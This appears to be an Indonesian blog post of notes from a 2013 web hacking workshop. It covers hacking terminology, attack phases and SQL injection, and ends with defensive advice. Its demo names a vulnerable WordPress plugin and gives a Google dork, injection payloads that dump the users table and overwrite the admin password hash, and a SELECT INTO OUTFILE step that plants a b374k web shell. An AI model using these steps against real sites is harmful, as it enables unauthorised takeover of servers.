Oleh : Zaenab A. Zahra
Teka-Teki Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang
Pemahaman
dasar ethical hacker
Keamanan
komputer menjadi penting?
-
Perkembangan
komputer
-
Ketergantungan
manusia
-
Tuntutan
kompleksitas semakin tinggi
-
Keamanan
menjadi anak tiri
-
Kemampuan
orang disebut hacker menjadi menurun
-
Kemampuan
rendah bisa menjadi ancaman tinggi untuk kepentingan umum
Terminologi
hacker
-
Vulnerability : mengetahui celah keamanan
-
Threat : bagaimana cara-cara yang harus
dilakukan supaya bisa masuk
-
Attack : prosees masuk/ membobol
keamanannya
-
Exploit : memanage apa yang harus dilakukan
di dalamnya
Contoh
Situs yang menyediakan exploits
- Metasploit
Framework - Exploit-db.com
securityfocus.com
Darkc0de.com
packetstormsecurity.org
Element-element
keamanan (CIA)
1.
Confidentiality
Keamanan informasi data untuk
diketahui atau dibaca oleh pihak yang tidak dikehendaki
2.
Integrity
/ integritas
Keamanan informasi data untuk
menghindari adanya perubahan yang tidak dikehendaki
-
3. Availability
Keamanan informasi data untuk
ketersediaan atau keberadaannya
Sebuah program harusnya berada di tengah-tengahnya.
Pengelompokkan
hacke
- Black Hat Hacker
- White Hat Hacker
- Grey Hat Hacker
- Suicide Hacker
Tahapan
aktifitas Hacking
- Reconnaissance
1.
Reconnaissance
Passive
- Pencarian data target di google
- Pencarian data target di berbagai
jejaring sosial
2.
Reconnaissance
Active
- HTTP Fingerprint
- Scanning,
pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
-
Darkc0de
- Gaining
Acces
- Exploitasi Remote Execution pada
celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
-
Exploitasi Remote Execution pada celah keamanan web
- Maintaining
acces
PHP Backdoor
Simple
php shell
R57
C99 /
C100
ASP
Backdoor
B374K
- Covering
Tracks
- Pembersihan berbagai exploit atau
software yang diupload
- Pembersihan jejak disesuaikan
dengan penggunaan aplikasi di target dan ke target.
KONSEP
SQL Injection
GET
dan POST
IMPLEMENTASI
pada method GET & POST
-
Langsung
dari URL
-
Header
: Content-Type: application/x-www-form-urlencoded
-
Data
: variable=value
Query
-
$query
= “SELECT * FROM contoh WHERE nama =’$username’”;
-
$username
= dari GET atau POST
SQL
Injection
-
$query
= “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel;
--’
-
$query
= “SELECT namaTabel FROM contoh WHERE
nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…
DEMO WEB HACKING
Wordpress Plugins - Google Maps via
Store Locator Plus Multiple Vulnerability
Vulnerability
Info
-
Description
: Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-
Version
: 2.7.1 - 3.0.1
-
Date
: 26-05-2012
-
Google
Dork : inurl:/wp-content/plugins/store-locator-le/
SQL
Injection Vuln
POST
Method, Advanced REST Client
-
Method : POST
-
Header : Content-Type:
application/x-www-form-urlencoded
-
Data : query=[injection]
-
Contoh:
query=SELECT
* FROM wp_users
Mengatasi
Teka-Teki Hash
UPDATE
– replace password
UPDATE wp_users SET
user_pass =
'$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;
-
Mengganti
password menjadi “Password”
Upload
b374k via Query
SELECT ’[kode script]’ INTO OUTFILE
“e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+
diganti %2B
Base
64 Encryption
Base64 adalah
istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner
dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal
dari konten pengkodean MIME tertentu. (Wikipedia, 2010)
PENGAMANAN
-
Update
CMS, plugin
-
Menggunakan
mysql_real_escape_string()
-
Memberikan
validasi pada tiap inputan
-
Berikan
length limit pada inputan
-
Config
database error report
-
Setting
php.ini
-
dll
0 comments:
Post a Comment